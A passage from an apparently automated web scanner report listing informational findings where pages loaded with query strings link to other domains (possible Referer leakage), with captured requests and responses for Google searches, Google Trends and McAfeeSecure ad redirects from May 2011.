<h3 class="r"><a href="http://haacked.com/tags/NuGet/default.aspx" class=l onmousedown="return clk(this.href,'','','','6','','0CEkQFjAF')">you've been HAACKED - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:bzlfDrJmvqwJ:haacked.com/tags/NuGet/default.aspx+nuget&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CE4QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://visualstudiogallery.msdn.microsoft.com/27077b70-9dad-4c64-adcf-c7cf6bc9970c" class=l onmousedown="return clk(this.href,'','','','7','','0CFAQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:th8VrvZNm1gJ:visualstudiogallery.msdn.microsoft.com/27077b70-9dad-4c64-adcf-c7cf6bc9970c+nuget&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFUQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://10rem.net/blog/2011/02/10/nuget-for-wpf-and-silverlight-developers" class=l onmousedown="return clk(this.href,'','','','8','','0CFYQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lIjU3mLg1SkJ:10rem.net/blog/2011/02/10/nuget-for-wpf-and-silverlight-developers+nuget&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.codethinked.com/you-really-should-be-using-nuget" class=l onmousedown="return clk(this.href,'','','','9','','0CFwQFjAI')">You Really Should Be Using <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_deOxj7rLngJ:www.codethinked.com/you-really-should-be-using-nuget+nuget&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGEQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kodefuguru.com/post/2011/05/07/You-Should-Use-NuGet.aspx" class=l onmousedown="return clk(this.href,'','','','10','','0CGIQFjAJ')">You Should Use <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QCNU8AKt12cJ:www.kodefuguru.com/post/2011/05/07/You-Should-Use-NuGet.aspx+nuget&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGcQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.outercurve.org/" class=l onmousedown="return clk(this.href,'','','','11','','0CGkQoggwCg')">Outercurve Foundation</a>
...[SNIP]...
<div><a href="http://nu.wikispot.org/" class=l onmousedown="return clk(this.href,'','','','12','','0CGsQoggwCw')">Nubular (Nu) Project Wiki</a>
...[SNIP]...
<div><a href="http://rubygems.org/" class=l onmousedown="return clk(this.href,'','','','13','','0CG0QoggwDA')">RubyGems</a>
...[SNIP]...
<div><a href="http://www.hanselman.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CG8QoggwDQ')">Scott Hanselman</a>
...[SNIP]...

22.56. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=localhost%3A19416%5D%2Fhoyt.net%2FSitefinity%2FStartup

The response contains the following link to another domain:

http://www.youtube.com/results?q=localhost:19416%5D/hoyt.net/Sitefinity/Startup&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=localhost%3A19416%5D%2Fhoyt.net%2FSitefinity%2FStartup HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=X0FYGmfTMyj1F459tNArdzOEBt_RZ2SblIezIj5PNBGR3jQME9gQohiVBgO7qW2uuK6LmpVtHT1ukJzdFNGFyH2UtPYO_X4n6dxuajnk48nYL-oftk6H-Nz9AjrWiY35

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 00:02:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 67089

<!doctype html> <head> <title>localhost:19416]/hoyt.net/Sitefinity/Startup - Google Search</title> <script>window.google={kEI:"hWnQTfm6EYLY0QHu4tHuDQ",kEXPI:"17259,23756,24692,24878,24879,25907
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=localhost:19416%5D/hoyt.net/Sitefinity/Startup&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...

22.57. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=play+station+network

The response contains the following links to other domains:

http://blog.us.playstation.com/
http://blog.us.playstation.com/category/psn/
http://community.us.playstation.com/
http://en.wikipedia.org/wiki/PlayStation_Network
http://news.cnet.com/8301-31021_3-20060773-260.html
http://techland.time.com/2011/04/21/playstation-network-outage-a-disaster-for-sony/
http://technologizer.com/2011/05/07/playstation-network-down-indefinitely-again/
http://us.playstation.com/corporate/contactus/
http://us.playstation.com/psn/
http://us.playstation.com/psn/community/
http://us.playstation.com/psn/playstation-store/
http://us.playstation.com/psn/playstation-store/playstation3/
http://us.playstation.com/support/answer/
http://us.playstation.com/support/systemupdates/ps3/
http://venturebeat.com/tag/playstation-network/
http://webcache.googleusercontent.com/search?q=cache:6IQKk2f-DN4J:www.csmonitor.com/Innovation/Horizons/2011/0421/PlayStation-network-down-after-launch-of-several-new-games+play+station+network&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PvrYSwfWN1gJ:techland.time.com/2011/04/21/playstation-network-outage-a-disaster-for-sony/+play+station+network&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Rb3HwSwuo5EJ:us.playstation.com/psn/+play+station+network&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:TOnr0Mfz108J:en.wikipedia.org/wiki/PlayStation_Network+play+station+network&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:UVthdPhOB8wJ:venturebeat.com/tag/playstation-network/+play+station+network&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:c8A60srv3_wJ:news.cnet.com/8301-31021_3-20060773-260.html+play+station+network&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:flGitwZYnsMJ:www.pcmag.com/article2/0,2817,2383924,00.asp+play+station+network&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:kPk7tZpntfkJ:blog.us.playstation.com/+play+station+network&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:n6q24aFExo8J:www.us.playstation.com/+play+station+network&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:qVvKeqTrCh8J:technologizer.com/2011/05/07/playstation-network-down-indefinitely-again/+play+station+network&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.csmonitor.com/Innovation/Horizons/2011/0421/PlayStation-network-down-after-launch-of-several-new-games
http://www.ebgames.com/
http://www.gamasutra.com/view/news/34664/Online_Gameplay_Other_Services_Return_To_PSN_SOE_Stationcom.php
http://www.gamestop.com/
http://www.pcmag.com/article2/0,2817,2383924,00.asp
http://www.sony.com/
http://www.tmrzoo.com/2011/24868
http://www.us.playstation.com/
http://www.xbox.com/
http://www.youtube.com/results?q=play+station+network&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=play+station+network HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=X0FYGmfTMyj1F459tNArdzOEBt_RZ2SblIezIj5PNBGR3jQME9gQohiVBgO7qW2uuK6LmpVtHT1ukJzdFNGFyH2UtPYO_X4n6dxuajnk48nYL-oftk6H-Nz9AjrWiY35

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:26:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 92093

<!doctype html> <head> <title>play station network - Google Search</title> <script>window.google={kEI:"5zbQTaL4K6L50gGXgt3tDQ",kEXPI:"17259,23756,24692,24878,24879,25907,27400,28505,29229,29685
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=play+station+network&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<span class=tl><a href="http://www.tmrzoo.com/2011/24868" class=l onmousedown="return clk(this.href,'','','','1','','0CCgQqQIwAA')"><em>
...[SNIP]...
<span class=tl><a href="http://www.gamasutra.com/view/news/34664/Online_Gameplay_Other_Services_Return_To_PSN_SOE_Stationcom.php" class=l onmousedown="return clk(this.href,'','','','2','','0CC4QqQIwAQ')">Online Gameplay, Other Services Return To PSN, SOE <em>
...[SNIP]...
<h3 class="r"><a href="http://www.us.playstation.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDgQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:n6q24aFExo8J:www.us.playstation.com/+play+station+network&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CD0QIDAC')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://us.playstation.com/psn/" onmousedown="return clk(this.href,'','','','3','','0CD8QqwMoADAC')">PlayStation Network</a>
...[SNIP]...
<div class=sld><a class=sla href="http://us.playstation.com/support/answer/" onmousedown="return clk(this.href,'','','','3','','0CEAQqwMoATAC')">Support</a></div><div class=sld><a class=sla href="http://us.playstation.com/corporate/contactus/" onmousedown="return clk(this.href,'','','','3','','0CEEQqwMoAjAC')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://us.playstation.com/support/systemupdates/ps3/" onmousedown="return clk(this.href,'','','','3','','0CEIQqwMoAzAC')">PS3... System Updates</a>
...[SNIP]...
<div class=sld><a class=sla href="http://blog.us.playstation.com/" onmousedown="return clk(this.href,'','','','3','','0CEMQqwMoBDAC')">PlayStation.Blog</a>
...[SNIP]...
<div class=sld><a class=sla href="http://us.playstation.com/psn/playstation-store/" onmousedown="return clk(this.href,'','','','3','','0CEQQqwMoBTAC')">PlayStation Store</a>
...[SNIP]...
<div class=sld><a class=sla href="http://us.playstation.com/psn/community/" onmousedown="return clk(this.href,'','','','3','','0CEUQqwMoBjAC')">Community</a></div><div class=sld><a class=sla href="http://community.us.playstation.com/" onmousedown="return clk(this.href,'','','','3','','0CEYQqwMoBzAC')">Forums</a>
...[SNIP]...
<h3 class="r"><a href="http://us.playstation.com/psn/" class=l onmousedown="return clk(this.href,'','','','4','','0CEkQFjAD')">PlayStation..Network ... <em>
...[SNIP]...
<div class=osl><a href="http://blog.us.playstation.com/category/psn/" onmousedown="return clk(this.href,'','','','4','','0CFAQ0gIoADAD')">PSN ... PlayStation Blog</a> - <a href="http://us.playstation.com/psn/playstation-store/" onmousedown="return clk(this.href,'','','','4','','0CFEQ0gIoATAD')">PlayStation Store</a> - <a href="http://us.playstation.com/psn/playstation-store/playstation3/" onmousedown="return clk(this.href,'','','','4','','0CFIQ0gIoAjAD')">PlayStation.. 3 downloadable ...</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Rb3HwSwuo5EJ:us.playstation.com/psn/+play+station+network&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CE4QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://blog.us.playstation.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CFQQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:kPk7tZpntfkJ:blog.us.playstation.com/+play+station+network&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CFkQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://technologizer.com/2011/05/07/playstation-network-down-indefinitely-again/" class=l onmousedown="return clk(this.href,'','','','6','','0CFwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qVvKeqTrCh8J:technologizer.com/2011/05/07/playstation-network-down-indefinitely-again/+play+station+network&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CGEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/PlayStation_Network" class=l onmousedown="return clk(this.href,'','','','7','','0CGIQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TOnr0Mfz108J:en.wikipedia.org/wiki/PlayStation_Network+play+station+network&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CGcQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://techland.time.com/2011/04/21/playstation-network-outage-a-disaster-for-sony/" class=l onmousedown="return clk(this.href,'','','','8','','0CGkQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PvrYSwfWN1gJ:techland.time.com/2011/04/21/playstation-network-outage-a-disaster-for-sony/+play+station+network&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CG4QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pcmag.com/article2/0,2817,2383924,00.asp" class=l onmousedown="return clk(this.href,'','','','9','','0CG8QFjAI')">Sony <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:flGitwZYnsMJ:www.pcmag.com/article2/0,2817,2383924,00.asp+play+station+network&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CHQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.csmonitor.com/Innovation/Horizons/2011/0421/PlayStation-network-down-after-launch-of-several-new-games" class=l onmousedown="return clk(this.href,'','','','10','','0CHUQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6IQKk2f-DN4J:www.csmonitor.com/Innovation/Horizons/2011/0421/PlayStation-network-down-after-launch-of-several-new-games+play+station+network&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHoQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://news.cnet.com/8301-31021_3-20060773-260.html" class=l onmousedown="return clk(this.href,'','','','11','','0CHsQFjAK')">Sony: More testing needed before <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:c8A60srv3_wJ:news.cnet.com/8301-31021_3-20060773-260.html+play+station+network&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CIIBECAwCg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://venturebeat.com/tag/playstation-network/" class=l onmousedown="return clk(this.href,'','','','12','','0CIMBEBYwCw')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UVthdPhOB8wJ:venturebeat.com/tag/playstation-network/+play+station+network&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CIgBECAwCw')">Cached</a>
...[SNIP]...
<div><a href="http://www.sony.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CIoBEKIIMAw')">Sony</a>
...[SNIP]...
<div><a href="http://www.gamestop.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIwBEKIIMA0')">GameStop</a>
...[SNIP]...
<div><a href="http://www.xbox.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CI4BEKIIMA4')">Xbox</a>
...[SNIP]...
<div><a href="http://www.ebgames.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CJABEKIIMA8')">EB Games U.S.</a>
...[SNIP]...

22.58. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=disney+cruise&date=2011-5-15&sa=X

The response contains the following links to other domains:

http://www.magicalkingdoms.com/blog/
http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
http://www.orbitz.com/blog/
http://www.orbitz.com/blog/2011/05/cruise-vacations-5-tips-for-your-first-cruise-on-disney-dream/
http://www.passporterboards.com/forums/
http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html

Request

GET /trends/hottrends?q=disney+cruise&date=2011-5-15&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=Lhm6ttn7an2-iBnzwND2ChEHpa2gcQrA0oxhn4qPKMBja0y3M9EooPWTFGVZE1WGhC0EeQbdhjodIci27iUTt4FJdl_w1CKKGajsRgpNHjVx0TFdmc2yQbpHgH6J9Zjt

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 16 May 2011 01:18:59 GMT
Server: Google Trends
Cache-Control: private, x-gzip-ok=""
Content-Length: 11547
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: disney cruise, May 15, 2
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html" target="_blank">
Enchanted Tiki Room News!! - PassPorter Community - Boards <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.passporterboards.com/forums/" target="_blank"> http://www.passporterboards.com/forums/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.orbitz.com/blog/2011/05/cruise-vacations-5-tips-for-your-first-cruise-on-disney-dream/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.orbitz.com/blog/" target="_blank"> http://www.orbitz.com/blog/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/" target="_blank">
The Dream Differences on <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.magicalkingdoms.com/blog/" target="_blank"> http://www.magicalkingdoms.com/blog/</a>
...[SNIP]...

22.59. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens

The response contains the following link to another domain:

http://pixel.mathtag.com/data/img?mt_id=100038&mt_dcid=1305510197

Request

Response

22.60. http://www.magicalkingdoms.com/blog/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.magicalkingdoms.com
Path:	/blog/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.magicalkingdoms.com/blog/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js?ver=3.3.11

The response contains the following link to another domain:

http://www.shareaholic.com/?src=pub

Request

GET /blog/wp-content/plugins/sexybookmarks/spritegen_default/jquery.shareaholic-publishers-sb.min.js?ver=3.3.11 HTTP/1.1
Host: www.magicalkingdoms.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cf6190390f14fba80a77f4845931a480

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Mon, 11 Apr 2011 19:54:52 GMT
ETag: "628c45-5d77-4a0a9f2e73b00"
Accept-Ranges: bytes
Content-Length: 23927
Content-Type: application/javascript

SHR4P={};if(typeof SHRSB_Globals=="undefined")window.SHRSB_Globals={};if(typeof SHRSB_Globals.perfoption=="undefined")SHRSB_Globals.perfoption="1";if(typeof SHRSB_Globals.minJQueryVersion=="undefined"
...[SNIP]...
<div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a>
...[SNIP]...

22.61. http://www.mcafeesecure.com/Link.sa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/Link.sa

Issue detail

The page was loaded from a URL containing a query string:

http://www.mcafeesecure.com/Link.sa?directory=47931

The response contains the following link to another domain:

http://www.anrdoezrs.net/click-2537521-10453836

Request

GET /Link.sa?directory=47931 HTTP/1.1
Host: www.mcafeesecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; CAMEFROM=www.fingerhut.com; resin=1724539402.20480.0000; __utma=185732405.396205410.1305377534.1305377534.1305509530.2; __utmc=185732405; __utmb=185732405.1.10.1305509530; adclick=1002-25

Response

HTTP/1.1 302 Found
Server: McAfeeSecure
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Location: http://www.anrdoezrs.net/click-2537521-10453836
Content-Type: text/html; charset=utf-8
Content-Length: 85
Connection: close
Date: Mon, 16 May 2011 01:40:03 GMT

The URL has moved <a href="http://www.anrdoezrs.net/click-2537521-10453836">here</a>

22.62. http://www.mcafeesecure.com/Link.sa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/Link.sa

Issue detail

The page was loaded from a URL containing a query string:

http://www.mcafeesecure.com/Link.sa?directory=8177

The response contains the following link to another domain:

http://www.bhphotovideo.com/?BI= 1358&KW=BANNER2&KBID=1807&img=bh_wl.gif

Request

GET /Link.sa?directory=8177 HTTP/1.1
Host: www.mcafeesecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; CAMEFROM=www.fingerhut.com; resin=1724539402.20480.0000; __utma=185732405.396205410.1305377534.1305377534.1305509530.2; __utmc=185732405; __utmb=185732405.1.10.1305509530; adclick=1002-25

Response

HTTP/1.1 302 Found
Server: McAfeeSecure
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Location: http://www.bhphotovideo.com?BI= 1358&KW=BANNER2&KBID=1807&img=bh_wl.gif
Content-Type: text/html; charset=utf-8
Content-Length: 109
Connection: close
Date: Mon, 16 May 2011 01:41:42 GMT

The URL has moved <a href="http://www.bhphotovideo.com?BI= 1358&KW=BANNER2&KBID=1807&img=bh_wl.gif">here</a>

22.63. http://www.mcafeesecure.com/Link.sa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mcafeesecure.com
Path:	/Link.sa

Issue detail

The page was loaded from a URL containing a query string:

http://www.mcafeesecure.com/Link.sa?directory=27074

The response contains the following link to another domain:

http://www.dpbolvw.net/click-2537521-10413444?cm_mmc=CJ-_-2132470-_-2537521-_-petco.com

Request

GET /Link.sa?directory=27074 HTTP/1.1
Host: www.mcafeesecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=185732405.; __utmxx=185732405.; __utmz=185732405.1305377534.1.1.utmcsr=server.iad.liveperson.net|utmccn=(referral)|utmcmd=referral|utmcct=/hcp/integration/hackersafe/hackersafe-grey.html; CAMEFROM=www.fingerhut.com; resin=1724539402.20480.0000; __utma=185732405.396205410.1305377534.1305377534.1305509530.2; __utmc=185732405; __utmb=185732405.1.10.1305509530; adclick=1002-25

Response

HTTP/1.1 302 Found
Server: McAfeeSecure
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Location: http://www.dpbolvw.net/click-2537521-10413444?cm_mmc=CJ-_-2132470-_-2537521-_-petco.com
Content-Type: text/html; charset=utf-8
Content-Length: 125
Connection: close
Date: Mon, 16 May 2011 01:42:49 GMT

The URL has moved <a href="http://www.dpbolvw.net/click-2537521-10413444?cm_mmc=CJ-_-2132470-_-2537521-_-petco.com">here</a>

22.64. https://www.mcafeesecure.com/RatingVerify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/RatingVerify

Issue detail

The page was loaded from a URL containing a query string:

https://www.mcafeesecure.com/RatingVerify?ref=www.fingerhut.com

The response contains the following links to other domains:

https://images.scanalert.com/css/rating-verify.css
https://server.iad.liveperson.net/hc/10599399/x.js?cmd=file&file=chatScript3&site=10599399&imageUrl=https://images.scanalert.com/images/liveperson/set03

Request

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:00 GMT
